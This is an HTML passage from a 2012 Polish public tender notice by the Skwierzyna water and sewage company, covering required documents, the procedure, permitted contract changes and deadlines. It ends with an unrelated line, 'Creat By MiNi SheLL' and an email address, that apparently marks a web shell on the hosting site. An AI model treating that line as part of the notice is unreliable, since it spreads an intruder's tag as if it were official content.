<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty określone w rozdziale VIII SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
1.Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną 
   na piśmie pod rygorem nieważności takiej zmiany. 
2.Zamawiający przewiduje możliwość dokonania zmian w treści umowy w 
   następujących przypadkach:
a)w sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy, a nie 
   powstałych z winy Zamawiającego lub Wykonawcy, 
b)konieczności wprowadzenia zmian wynikających z przekształcenia stron umowy 
   bądź zmiany osób uprawnionych do występowania w imieniu stron,
c) zmiany stawki podatku VAT,
d)zmiany terminu wykonania umowy z przyczyn:
-wstrzymania przez Zamawiającego całości lub części Robót Budowlanych bądź 
 Zadań Towarzyszących,
-działania Siły Wyższej,
-wystąpienie intensywnych, ciągłych opadów śniegu lub deszczu przez okres  
 minimum 2 (dwóch) dni roboczych uniemożliwiających wykonanie Robót Budowlanych 
 zgodnie z technologią i sztuką budowlaną oraz wystąpienia przez okres 2 (dwóch) 
 dni roboczych temperatury poniżej 5o C podczas wykonywania prac konstrukcyjnych 
 i zewnętrznych,
-opóźnienia Zamawiającego w podejmowaniu decyzji, do których podjęcia obliguje go 
 Umowa,
-wystąpienie błędów projektowych skutkujących wstrzymaniem wykonywania Robót 
 Budowlanych lub całego Zadania Inwestycyjnego mających bezpośredni wpływ na 
 terminowe wykonanie całości Robót Budowlanych
-wystąpienia Robót Zamiennych/Robót Dodatkowych związanych z realizacją 
 zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej 
 realizacji.
e)zmian dokumentacji projektowej, 
f)zmiany technologii wykonawstwa w stosunku do przewidzianej w dokumentacji 
  projektowej, 
g)zamiany materiałów przewidzianych do wykonania robót w stosunku do materiałów 
   przewidzianych w dokumentacji projektowej,  
h)niezrealizowanie pełnego zakresu prac wraz z odpowiednim zmniejszeniem 
  wynagrodzenia umownego, 
i)gdy zmiany będą korzystne dla Zamawiającego i nie będą:
-wprowadzane warunki, które gdyby zostały ujęte w ramach procedury przetargowej 
 udzielenia zamówienia umożliwiłyby dopuszczenie innych ofert niż ta, która została 
 pierwotnie dopuszczona,
-modyfikowały równowagi ekonomicznej umowy na korzyść Wykonawcy w sposób, 
  który nie był przewidziany w postanowieniach pierwotnego zamówienia.
k)Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
-zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne 
 spełniające warunki określone w SIWZ, według polityki kadrowej Wykonawcy,
-zmiana osób podanych w ofercie wykonawcy przy pomocy których Wykonawca 
 realizuje przedmiot umowy nie  wymaga aneksu do umowy (zmiana jest możliwa na 
 osoby spełniające wymogi SIWZ, a dla skutecznej zmiany   niezbędne jest 
 uzyskanie zgody Zamawiającego na zaproponowaną osobę),
3. Wykonawca zobowiązany jest niezwłocznie, a nie później niż w ciągu 4 (czterech) 
   dni, zawiadomić Zamawiającego na piśmie przesłanym za pośrednictwem telefaksu 
   na numer (95) 71-71-541  lub doręczonym do rąk Inspektora Nadzoru o 
   okolicznościach mogących spowodować niewywiązanie się przez Wykonawcę z 
   terminu wykonywania Robót Budowlanych i wykazać wpływ tych okoliczności na 
   przesunięcie tego terminu oraz przewidywany czas takiego przesunięcia. 
   Okoliczności wskazane w zawiadomieniu Wykonawcy powyższe powinny zostać 
   ponadto udokumentowane przez Wykonawcę odpowiednim wpisem w dzienniku   
   budowy, określającym datę wystąpienia przeszkody, jej charakter oraz 
   przewidywany czas trwania. W razie spełnienia powyższych obowiązków termin 
   zakończenia przedmiotu umowy ulega przedłużeniu o czas, w jakim okoliczności 
   wskazane powyżej, wykluczają lub przedłużają prowadzenie przez Wykonawcę 
   Robót Budowlanych pod warunkiem jednakże, iż zmiana terminu  zostanie 
   uprzednio na piśmie zaakceptowana przez Zamawiającego. 
4.Strony uzgodnią w drodze pisemnego aneksu do niniejszej Umowy zmiany terminu 
   wykonania Robót Budowlanych lub zakończenia wykonania Robót Budowlanych w 
   przypadku zmian w zakresie Robót Budowlanych wprowadzonych przez 
   Zamawiającego lub zlecenia Wykonawcy Robót Zamiennych/Robót Dodatkowych, 
   których wprowadzenie, ze względów technicznych lub wykonawczych,uniemożliwia 
   dotrzymanie terminu umownego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwik.skwierzyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zakładu Wodociągów i Kanalizacji Sp. z o.o. w Skwierzynie
ul. Chrobrego 5, 66-440 Skwierzyna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2012 godzina 10:30, miejsce: W siedzibie Zakładu Wodociągów i Kanalizacji Sp. z o.o. w Skwierzynie
ul. Chrobrego 5, 66-440 Skwierzyna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Złożony wniosek o dofinansowanie z Programu Rozwoju Obszarów Wiejskich w ramach działania 321: Podstawowe usługi dla gospodarki i ludności wiejskiej.
Wniosek o przyznanie pomocy złożony w Lubuskim Urzędzie Marszałkowskim w Zielonej Górze..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com